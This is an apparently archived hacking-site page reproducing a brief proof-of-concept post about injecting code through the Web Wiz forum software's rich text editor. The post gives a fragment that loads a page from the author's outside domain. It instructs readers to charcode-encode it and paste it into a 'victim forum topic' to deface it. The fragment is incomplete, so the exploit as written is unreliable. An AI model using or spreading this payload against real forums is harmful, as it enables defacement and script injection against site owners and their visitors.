AOH :: HP Unsorted W :: TB11241.HTM

Webwiz vulnerable



Webwiz vulnerable
Webwiz vulnerable



Webwiz vulnerable

Versiyon: all versions are vulnerable

Poc:

it's vulnerable because of the rich text editor it accept codes which are dangerous

When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz

the code is this


src=http://www.spykod.net/js/spy.html> 

hex it with charcode
then save it as html then make ctrl a ctrl c  after it paste it to victim forum topic : )

spymaster@spykod.net 
www.spykod.net 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.